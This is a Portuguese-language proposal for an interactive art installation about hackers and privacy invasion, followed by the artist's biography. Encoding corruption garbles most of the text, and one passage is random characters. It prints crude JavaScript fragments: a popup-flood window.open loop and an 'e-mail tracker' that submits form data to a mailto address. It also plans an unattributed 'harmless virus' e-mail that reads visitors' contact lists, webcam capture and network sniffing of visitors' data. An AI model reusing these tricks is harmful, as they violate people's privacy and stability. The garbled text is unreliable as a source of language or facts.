Professional Documents
Culture Documents
De Lucila Meirelles
Um ser invisvel no sistema, que acredita no trnsito livre de informaes, que busca incansavelmente o con ecimento da ci!ncia da computao na velocidade da informao, que domina a lin"ua"em de pro"ramao, que tem uma vontade insaci#vel de e$plorar o descon ecido e bisbil otar a vida al eia%
&
<imgsrc=http://projeto=navigator{}
'sse pro(eto quanto ) sua formatao contou com a participao do Dr% *rof Marcos *ereira +arretto, especialista em ,ob-tica e .istemas de /nformao e com o arquiteto 0uil erme Mendes da ,oc a, desde o incio da pesquisa% 1 "rande desafio nesse 2ltimo perodo de formatao foi abandonar a id3ia de uma "rande instalao, em ra4o dos altos custos que poderiam acarretar e, partir para a construo de um ambiente ac5er virtual essencial e possvel% 6endo esse pensamento como meta fomos em direo a um ambiente sntese invasivo, mais intimista, mais solit#rio, mais um poro7"ara"em eletr8nico escondido, aonde uma rede mais en$uta de micros conectados a pro"ramas de soft9are estaro posicionados para o visitante intera"ir com o ambiente operacional ac5er% : instalao interativa proposta nesse pro(eto ser# um sistema de comunicao de dados, uma combinao de equipamentos, soft9are, lin as de comunicao, pessoas e procedimentos, constituindo um laborat-rio operacional de ataque e defesa, uma estao de trabal o ac5er, um ambiente de processamento de informaes% 1 visitante ser#, ao mesmo tempo, invasor e invadido% 1 ataque ) sua privacidade se dar# em forma de rede; atrav3s de um "ame interativo o visitante poder# acessar as informaes roubadas, decodificando<as% 'ssa 3 uma maneira de mostrar o universo ac5er invadindo vidas% ' apontar um sentimento comum que vem interferindo no nosso cotidiano atual: o medo de invases na internet%
omem!aran"a omem!aran"a "ac#er do n$u%&"ac#er!aran"a 'spal"a aonde (uer )ou*a a sen"a (ue (uiser 'le + o omem!aran"a.,
'sse pro(eto tra4 ) tona a refle$o contempornea sobre a invaso de privacidade, que vem interferindo na vida das pessoas, na vida da sociedade, na vida das naes% :tualmente na ci!ncia da computao os artifcios de espiona"em e invaso de privacidade so sofisticados% *ro"ramas so criados para que se disseminem so4in os, infectando v#rios computadores e aumentando o tr#fe"o de informaes em rede, (# que seus endereos
=
permanecem "ravados na teia da min oca >9orms?% *ro"ramas que alteram p#"inas na /nternet >defacements?; pro"ramas que criam c-di"os para quebrar sistemas computacionais >e$ploits?% Como o avano da inform#tica 3 r#pido, assim tamb3m o aparecimento de novos pro"ramas maliciosos que com seus poderosos recursos infectam nossos sistemas operacionais e nervosos% 'sses invasores esto aumentando a cada dia sua forma de propa"ao e fa4endo novas vtimas% ,ecentemente o +rasil foi indicado como o campeo mundial de defacement%
-oc. precisa ter consci.ncia de (ue seu micro + uma porta a*erta para o mundo& com a agravante de voc. no poder ver& (uem est te vendo,
exe.zipdoc.informao.//val e=
1 ambiente operacional 3 a principal porta de entrada para os usu#rios acessarem o ambiente de informaes e tamb3m para os ataques diri"idos contra esse mesmo ambiente, representando atualmente um dos maiores fatores de risco% Cada ve4 mais as or"ani4aes umanas tornam<se dependentes de informaes arma4enadas em computadores% ' o "rau de depend!ncia a"ravou<se muito em funo da tecnolo"ia de inform#tica, que permitiu acumular "randes quantidades de informaes em espaos restritos% 1 meio de re"istro 3 ao mesmo tempo meio de arma4enamento, meio de acesso e meio de ataque% Ao so todas as pessoas que se conscienti4aram a respeito do alto "rau de vulnerabilidade em relao ao acervo de informaes%
-oc. nunca est completamente annimo, <img src=http:// endereo da imagem onLoad=var password=senha,alert(mensagem(maisculas),);var c= while(c!=")#var p=password) #alert(para$%ns)&else#alert('esculpe mas ter( )ue sair do *hat);vari*ounter= ;while(true)window+open
:l3m dos riscos relacionados com o acesso no autori4ado, o ambiente de comunicao de dados 3 tamb3m a parte mais fr#"il do ambiente de informaes% /nformaes arma4enadas em meios de re"istro informati4ados no so realmente apa"ados quando se elimina o arquivo a elas associado% 1s dados permanecem no espao ocupado at3 que outro arquivo se(a "ravado em cima do mesmo espao% Aesse lapso de tempo, um eventual violador com o con ecimento necess#rio de computao pode acessar essas informaes%
/lu%o descone%o O (ue leva uma pessoa a focar sua vida numa *usca infinita pela ordem catica do con"ecimento0 1uem no vive no mundo eletrnico no precisa sa*er disso. 2odem continuar com suas vidas va3ias e sem sentido,.
B
1utro ponto de ataque so as redes privadas e p2blicas% 1 problema reside principalmente na falta de cultura de se"urana entre os usu#rios de inform#tica em "eral, incluindo os pr-prios profissionais das #reas de inform#tica% :proveitam<se da "rande velocidade e capacidade de cru4amento de informaes que os computadores possuem para obterem benefcios r#pidos% Mas a mesma facilidade proporcionada pelos computadores tamb3m implica alto risco de violao%
4 imposs5vel sa*er a origem das informa6es (ue esto sendo tra3idas pra dentro de seu am*iente operacional, ,-.%/01L234oe 5ooa67p8%49.+:;<v;ie=J>,)(?/@ Aec=9BCD+++ iE=&)/+.+2(FG<H5.IA->JK,'d&L MH"NuAC,#dp,g+u//=2OiPQvR <RK6l,Rwi'>>pS-L$TL$Rd#p13uU <MMpppVW *=R&XcYTtZe>>poy3H#(//<
:o lon"o da ist-ria, o ser umano sempre buscou o controle sobre as informaes que l e eram importantes de al"uma forma; isso 3 verdadeiro mesmo na mais remota :nti"uidade% 1 que mudou desde ento foram as formas de re"istro, arma4enamento e de proteo das informaes%
... de (ue adianta a informao de um "ac#er (ue tenta *is*il"otar nosso computador0, Mera curiosidade...
1 impulso para descobrir se"redos est# profundamente enrai4ado na nature4a umana% : ist-ria dos c-di"os e de suas c aves 3 uma batal a secular entre os criadores de c-di"os e os decifradores% 1s protocolos di"itais usam a cripto"rafia para manter se"redos% : cripto"rafia 3 to anti"a quanto a pr-pria escrita pois (# estava presente no sistema da escrita iero"lfica dos e"pcios% Depois da .e"unda 0uerra Mundial, com a inveno do computador, a #rea floresceu, incorporando comple$os al"oritmos matem#ticos% Aa verdade a cripto"rafia formou a base para a ci!ncia da computao moderna e 3 usada para prote"er dados sensveis contra revelao% E um m3todo de esconder informaes e pass#<las para c-di"os bin#rios, como F111F1F11, ou para outras palavras, e c-di"os% E ali que voc! pode comunicar seu se"redo para o outro, sem nin"u3m mais ficar sabendo, at3 o momento em que seus c-di"os so decodificados% Mesmo usando<se a cripto"rafia para transmitir informaes, # "rande probabilidade de que al"um atacante consi"a desencriptar o c-di"o e fa4er uso das informaes; # tamb3m a "rande quantidade de ac5ers, cu(o 2nico passatempo 3 invadir sistemas% E alta a probabilidade estatstica de al"um deles conse"uir decodificar sua mensa"em% 1 +rasil c e"ou ao topo da lista de ataques mundiais de ac5er, se"undo a consultoria britnica mi&"% >Gol a de .o *aulo < Aovembro &FF&?
)astreador de e!mail 8img src9,endereo da imagem,:idt"9;"eig"t9;onload9<parent.frames=;>.doc ument.forms=?>.met"od9,get,@parent.frames=;>.docume ment.forms=?>.encoding9,te%tAplain,@parent.frames=;>.d ocument.forms=?>.action9mailtoBseu mail@parent.frames=;>.document.forms=?>. CDEMIF.cli# GH@I
E possvel para um ac5er plantar um soft9are em sua m#quina que pode mais tarde ser provocada para violar sua privacidade ou para usar a sua m#quina como um H4ombieI, e atacar outras m#quinas% Deve<se sempre ter em mente que ainda no e$iste um sistema totalmente ) prova de acesso no autori4ado% Cuase todos esses acessos ocorrem em ambientes abertos ao acesso p2blico e que contam com pouca ou nen uma proteo efetiva contra ataques%
<imgsrc=instalao/! ser<"h#}
Mantivemos a id3ia da arquitetura da instalao ter semel anas com o universo operacional dos ataques e defesas ac5er, aquilo que acontece dentro do computador% 6ransportaremos para o espao fsico da instalao, aplicativos, pro"ramas criados por ac5ers para atacar o computador al eio como uma maneira de mostrar para os usu#rios, que v#rios servios que ele acessa dentro da /nternet, tem uma car"a de risco associada, que pode causar impactos em seu ambiente% :s informaes pessoais, contidas no disco KD, so o ob(etivo 2ltimo do ac5er% 'scondidos, cripto"rafados, codificados, esto ali os se"redos de cada um de n-s% : estrutura e$terna e interna da instalao lembrar# ao mesmo tempo o arcabouo de um C*U e uma estao de trabal o ac5er%
sistemati4ar todo o con ecimento adquirido, e tamb3m, para se visuali4ar qual o perfil e as sensaes que o pro"rama do soft9are devero mostrar% 1 soft9are ter# o formato de um (o"o l2dico de c-di"os secretos e sua descodificao, pr-prio dos ciberbeatni5s no espao virtual%
7t+ "oje no desco*r5 aonde veio o ata(ue. Fanto pode ter sido um cavalo de tria ou uma fal"a de segurana,.
6odos os atacantes apresentam certas caractersticas% : primeira e mais -bvia 3: eles no querem ser apan ados% 6o lo"o consi"am acesso ao seu sistema, faro todo o possvel para mant!<lo com um perfil discreto ou at3 mesmo montando outras vias de acesso; dessa forma, se o atacante for pe"o, ele pode entrar e sair Hpela porta dos fundosI% : bac5door 3 um pro"rama que se aloca no sistema com a finalidade principal de vascul ar o computador al eio, controlando tudo no computador invadido sem que o usu#rio perceba% .endo assim a entrada da instalao ser# feita pela porta traseira do computador% :o penetrar nesse ambiente de processamento de informaes pela bac5door, o visitante nem notar# que seus dados foram roubados%
$ Ko duvide de (ue eles esto por perto. 'les esto por toda parte,.
: m# noticia associada aos atacantes 3 que eles formam uma confraria para trocar informaes, de modo que suas informaes mais secretas podem ser de domnio p2blico em questo de dias ou mesmo oras%
Cualquer indivduo transforma<se, da noite para o dia, em um manipulador de um sistema que transforma a sua tela em lin5s inima"in#veis, de informao no linear, onde os padres so desfeitos% Mostraremos a tela a4ul, aquela tela aonde nada mais funciona, o computador trava, a mais con ecida blue screen of death, para o visitante se lembrar desse momento di"ital inesquecvel%
-oc. j teve um son"o (ue voc. estivesse to seguro (ue fosse real0,
1s ac5ers "ostam de ler science fiction, vo a convenes em que se discute fico cientfica% Muitas ve4es so recon ecidos como o omem aran a: aquele que entra pelos menores buracos, crava um bu" onde quer, tecem intricadas teias para continuar sua e$ist!ncia, so solit#rios% 'sse universo de realidade fant#stica misturada com o ambiente science fiction under"round estar# representado tanto na formatao do soft9are como no espao fsico da instalao%
Ks amamos o tato dos teclados e di3em (ue ten"o a ponta dos dedos ac"atadas por passar "oras digitando,
1F
11
:o prosse"uir, o visitante adentrar# o ambiente H+lue .creen of Deat I, o painel a4ul de parede inteira, com a frase Hblue screen of deat I e, ) sua esquerda, um cemit3rio de computadores, em que "abinetes e componentes >dis5 drivers, KDs, monitores, teclados e outros? estaro amontoados, formando uma pil a crescente, at3 o final do corredor% 1 CS1.'6 Aa sequ!ncia, o visitante encontrar# H1 closetI% .ob roupas e ob(etos, monitores mostraro ima"ens da recepo >ambiente H: iscaI?, em que novos visitantes estaro se cadastrando% Mostraro tamb3m os dados destes visitantes sendo HroubadosI, atrav3s dos c amados HsniffersI, pro"ramas que capturam dados das redes de computadores% 'm certos momentos, os formul#rios completamente preenc idos sero mostrados e os resultados da busca pela /nternet dos demais dados dos visitantes >telefone, n2mero de conta corrente, email, C*G, etc?% 'm outros monitores, ser# convidado a invadir sites >simulados? como do G+/, ,eceita Gederal, *ent#"ono, Hcrac5eandoI a sen a de acesso% Cuem resistir# T 1 ambiente H1 CS1.'6I est# na fi"ura @% G/,'U:SS 'nto, continuando o percurso, o visitante se encontrar# no ambiente HGire9allI, contendo uma porta corta<fo"o dupla, com uma fec adura com se"redo% 1 visitante, para continuar, dever# tentar por pelo menos = ve4es adivin ar o se"redo da fec adura eletr8nica, para que a porta se(a liberada% :o liberar a primeira porta, que se fec ar# automaticamente, o visitante ficar# retido, at3 que consi"a liberar a se"unda porta >tamb3m ap-s = tentativas para adivin ar a sen a de acesso?% D'G:C'M'A6. Ginalmente, o visitante atin"e o ambiente HDefacementsI, no qual encontrar# uma sala totalmente ne"ra, na qual se v! uma mesa com = pequenos teclados, iluminados por uma t!nue lu4 a4ul% :o comear a acionar as teclas, na parede ao fundo, sero pro(etadas ima"ens de documentos pessoais >,0, carteira de abilitao, C*G, cartes de cr3dito, etc?% :s ima"ens sero "eradas pelo computador para os visitantes na sala de acordo com as 2ltimas ima"ens obtidas no ambiente H: /nformaoI% Cada tecla que for pressionada pelo visitante causar# uma interfer!ncia cripto"r#fica na ima"em% :p-s 1F toques, a ima"em ser# decripto"rafada momentaneamente para, em se"uida, a tela ficar Hblac5I%
1&
1 ambiente HD'G:C'M'A6.I est# na fi"ura B% P/,U. .*:M : instalao enviar# uma Hs ort messa"eI ao visitante, se este tiver fornecido o seu telefone celular, contendo a mensa"em H: bu" for VouI% :inda, no dia de sua visita, a instalao enviar# ao email do visitante um email contendo um vrus inofensivo, sem identificao de remetente, contendo no assunto >Hsub(ectI? uma refer!ncia pessoal >por e$emplo, HUm presente do Gantasma .olit#rio para voc!, GulanoI?% 'ste vrus, na forma de um ane$o >Hattac mentI? mostrar# na tela a ima"em do ,0 do visitante e listar# al"uns de seus dados pessoais, como por e$emplo, a lista dos primeiros 1F nomes re"istrados em sua lista de contatos, com um boto per"untando se dese(a ou no enviar um email ao contatos listados% 'ste ataque se repetir#, uma semana ap-s a sua visita%
1=
c:'"r n programas"on mo se
.e"ue<se uma descrio sucinta dos pro"ramas a serem desenvolvidos para cada ambiente% : /.C: .istema para cadastro de dados pessoais, contendo a solicitao obri"at-ria de nome, r", email% .er# solicitado tamb3m, opcionalmente, seu telefone celular% Uma cmera >tipo 9ebcam? estar# instalada para que obter<se a sua foto% : iluminao do ambiente dever# ser favor#vel a que a foto ten a um ra4o#vel resultado% : /AG1,M:QR1 .istema que mesclar# um trec o do vdeo HCripto"ramasI, de cerca de B se"undos, a lon"os trec os em ne"ro, de cerca de 1B se"undos% Durante a e$ibio do vdeo, o sistema tamb3m dever# obter uma foto do visitante, utili4ando<se de uma 9ebcam% 1 sistema ser# calibrado para identificar que trata<se de uma foto >ou se(a, que al"um visitante est# posicionado adequadamente? e no foi um disparo em va4io, utili4ando<se de t3cnicas de processamento de ima"em >Hed"e detectionI?% 1 CS1.'6 Dever# ser instalado um pacote de Hnet9or5 sniffin"I, dos v#rios disponveis "ratuitamente% 1 pacote dever# ser confi"urado de forma a mostrar as mensa"ens que trafe"am na rede de cadastramento de visitantes >: /.C:?% Dois monitores mostraro o Hsniffin"I% Devero tamb3m ser instalados dois monitor que mostrem as ima"ens obtidas com a 9ebcam instalada no ambiente : /.C:, al3m dos formul#rios sendo di"itados nW : /.C:, sincroni4adamente com a di"itao% 'ste soft9are dever# ser e$ecutado em dois monitores% :inda, telas de acesso >Hlo"inI? a sites<alvo de ataques frequentes, particularmente do G+/, *ent#"ono e ,eceita Gederal brasileira% 1 visitante dever# ser compelido a tentar adivin ar a sen a de acesso, recebendo respostas ameaadoras >como H6oda tentativa de acesso 3 monitorada% 1s invasores sero perse"uidos na forma da leiI?% 1s sites sero simulados, no sendo portanto o acesso aos sites reais% Devem ser instalados & terminais para interao dos visitantes%
1@
G/,'U:SS Dever# ser desenvolvido um ard9are que libere a porta, ap-s = tentativas de acesso% D'G:C'M'A6. Dever# ser desenvolvido um soft9are que sinteti4e ima"ens de documentos dos prov#veis presentes na sala >,0, certificado de reservista, C*G, etc?% 1 soft9are dever# ressaltar a foto do visitante >piscando, em cor diferente ou outra forma? para c amar<l e a ateno% :s ima"ens sinteti4adas dos documentos sero mostradas rapidamente, em sucesso, impedindo que o visitante perceba detal es, entremeadas com trec os do video HCripto"ramasI% :s ima"ens sero mostradas por um can o SCD de alta luminosidade, em parede inteira% P/,U. .*:M Dever# ser desenvolvido o Hvirus inofensivoI, pro"rama convencional que acessar# a lista de contatos do visitante e conter# a ima"em do ,0 do visitante% Um sistema de envio de email >sendMail? dever# ser confi"urado para enviar as mensa"ens, sem mostrar o emiss#rio, e tendo o Hvirus inofensivoI como ane$o% 1 sistema deve ainda a"endar o re<envio da mensa"em, ap-s uma semana da visita% 0',:S 6odos os ambiente da instalao devero contar com cmeras e sistema de som, para vi"ilncia e instruo aos visitantes% *essoal treinado dever# estar disponvel para orientar os visitantes, tanto em suas d2vidas como para prosse"uir no percurso da instalao%
1B
;.7m*iente 7 ICL7,
X :tor 1 Pisitante Caso de uso Cadastro Descrio 1 visitante dever# preenc er uma fic a com seus dados pessoais >nome, email?% 'stes dados devero ficar arma4enados para posterior envio de email >ambiente .*:MY? 1 sistema dever# contar com uma cmera >tipo 9ebcam?, escondida e sobre o teclado, focali4ando a di"itao do visitante% :s ima"ens assim obtidas sero mostradas, on<line, em al"uns dos terminais do ambiente HCS1.'6I%
& Cmera
Captura de ima"ens
?.7m*iente 7 IK/O)M7MNO,
X :tor 1 Pisitante acionando sensor infra< vermel o e cmera & Pisitante Caso de uso Captura da foto"rafia Descrio 1 sistema dever# fa4er uma foto do visitante, quando o sensor >infravermel o? comandar% 'sta ima"em ser# utili4ada, no ambiente HDefacementsI, para "erar ima"ens sinteti4adas dos documentos do visitante '$ibio de 1 sistema dever# e$ibir um trec o de cerca de 1F trec os do se"undos do vdeo HCripto"ramasI, mantendo a vdeo tela em Hblac5I por &F se"undos ou convidando o HCripto"ramasI visitante a deslocar<se ao pr-$imo ambiente de al"uma forma mais direta%
O.7m*iente O LLOC'F,
X :tor 1 Pisitante Caso de uso Pisuali4ao da di"itao Descrio 1 sistema dever# e$ibir a di"itao sendo efetuada por um visitante no terminal de cadastramento,
1D
& Pisitante
= Pisitante
@ Pisitante
B Pisitante
.atan
sincroni4ada com a sua di"itao% Caso no a(a nen um visitante cadastrando<se neste momento, dever# e$ibir um filme com uma di"itao 1 sistema dever# e$ibir as ima"ens da cmera que focali4a a di"itao do visitante% Caso no a(a nen um visitante cadastrando<se neste momento, dever# e$ibir um filme com uma di"itao, sincroni4ado com o do use<case anterior 1 sistema dever# e$ibir a tela de entrada no *ent#"ono >ou outro site deste tipo?, "erando uma tela de aviso >Hperpetrador 9ill be prosecuted%%%I? quando o visitante tentar fa4er lo"in 1 sistema dever# e$ibir a tela de um HsnifferI de rede, mostrando a di"itao acontecendo no terminal de cadastramento% .e no ouver nen um visitante cadastrando<se no momento, dever# e$ibir um filme sincroni4ado com o use<case 1% 1 sistema dever# e$ibir a tela do .atan, fa4endo portscan nas m#quinas da instalao
P.7m*iente D'/7L'M'KFC,
X :tor 1 Pisitante Caso de uso '$ibio de documentos Descrio 1 sistema dever# e$ibir ima"ens de documentos pessoais >r", carteira de motorista? dos 2ltimos visitantes da instalao >parmetro do sistema?, em uma sequ!ncia r#pida de ima"ens que destaque a foto"rafia nos documentos e que esconda os nomes% :s teclas que forem di"itadas pelo visitante sero mostradas por al"uns se"undos >p%e$%, & se"undos? e usadas em se"uida para cripto"rafar parte da ima"em que est# sendo e$ibida%
Q.7m*iente C27MJ,
X :tor Caso de uso 1 Pisistante em Pirus seu computador dom3stico Descrio 1 sistema dever# enviar, no dia da visita e uma semana ap-s, um email ao visitante que se cadastrar no ambiente H: /.C:I, contendo um vrus inofensivo >que no se instalar# no computador do visitante? que mostrar# al"uns dados do visitante arma4enados em seu computador 1 sistema enviar# ao visitante, se este tiver fornecido seu telefone celular, um .M. >s ort messa"e? ainda durante a sua visita ) instalao, com uma mensa"em que informe que foi HcapturadoI% 1J
.M.
R.7dministrao
X :tor 1 63cnico Caso de uso Descrio Confi"urao 1 sistema dever# permitir a confi"urao de: <n2mero de ima"ens a arma4enar para e$ibio no ambiente HDefacementsI <selecionar entre a e$ibio do vdeo e o sinal da camera, nos casos de uso Closet<1,&,@ <todos os tempori4adores includos nos diversos m-dulos
1.Cadastrar visitante
visitantes
Email+virus
Visitante
otos
'egmentos_video
).Exibir de acement
.antasma solit!rio
De acement
Isca
'"am*
Closet
In ormao
C%,equisitos computacionais
6odos os computadores devero ser conectados em rede e ) /nternet% : confi"urao de todos os equipamentos 3 possuir um processador no mnimo *@ Z 1%D0K4, &BDMbVtes de mem-ria, @F0bVtes de disco r"ido, Sinu$ ,edKat L ou equivalente, placa de rede, monitor 1L
1JI SCD, teclado, mouse% *erif3ricos adicionais esto especificados a se"uir, quando necess#rios% :mbiente : /.C: : /AG1,M:QR1 CS1.'6 D'G:C'M'A6. .*:M Y :dministrao FOF7L Cuantidade 1 & D = 1 1 ;P Confi"urao adicional <9ebcam <9ebcam <interface de acionamento <can o
1M
&F
&1
&&
Lucila Meirelles
Aasceu em .o *aulo em 1MB=% Gormou<se em Kist-ria% 'm meados da d3cada de JF, ao lado do artista pioneiro da vdeo arte no +rasil [os3 ,oberto :"uilar, participou como atri4 de al"uns vdeos e eventos multimdias ideali4ados por :"uilar como: %ucila, filme policial!, &io de %u'!, Circo (ntropof$gico!, )pera do *** mundo! % Aos anos LF inicia sua carreira independente como autora de document#rios e$perimentais% .eus vdeos, +ivete!, Crianas (utistas!, ,infonia +anamrica!, Cego )liveira no serto do seu olhar! "an aram pr!mios nacionais e participaram de mostras internacionais como 6 e Oitc en >Aova `or5?, Manifestation /nternacionale de Pdeo et 63l3vision >Montbeli#rd?, 6 e +lac5 :est etic >Uas in"ton?, '$perimentos 6ropicais, +er5eleV :rt Museum, >+er5eleV? '$perimentos 6ropicais \ ,ecent Pideo from +ra4il, Dallas Pideo Gestival >Dallas?% ,ecebeu a +olsa Pitae de :rtes para a reali4ao do pro(eto -ist.rias %uminosas do serto!. Durante o ano de &FF1 or"ani4ou (unto com um "rupo de 1F videoartistas, o "rupo HCorpo *resenteI, um pro(eto sobre o Corpo onde cada artista reali4ou um vdeo de um minuto sobre uma parte do corpo% 'm &FF& foi "an adora do *ro"rama 6ransmdia que apoia a conver"!ncia de mdias e novas interseces entre arte, ci!ncia, mdia e tecnolo"ia com o pro(eto H ) fantasma solit$rio do poro eletr/nico devora os c.digos secretos do sistema operacional como um espaguete retorcido e impreciso!.
&=
<font size=!3ndice<//:{nic.//"frames
4. <imgsrc=http://projeto=navigator{} ?% exe.zipdoc.informao.//val e= O. <imgsrc=instalao/! ser<"h#} P. <imgsrc=perc rso}on load=alert%&/n Q. c:'"r n programas"on mo se R. "schema soft(are)*doc ment.forms: S% <img src=ficha t+cnica,#-ltxmpnic. T. <ahref=/es0 isa}!navigator. ser1ge U. "img src=c rric l m.val e=%2
5 6 7 44 48 4#9 #4 ##
&@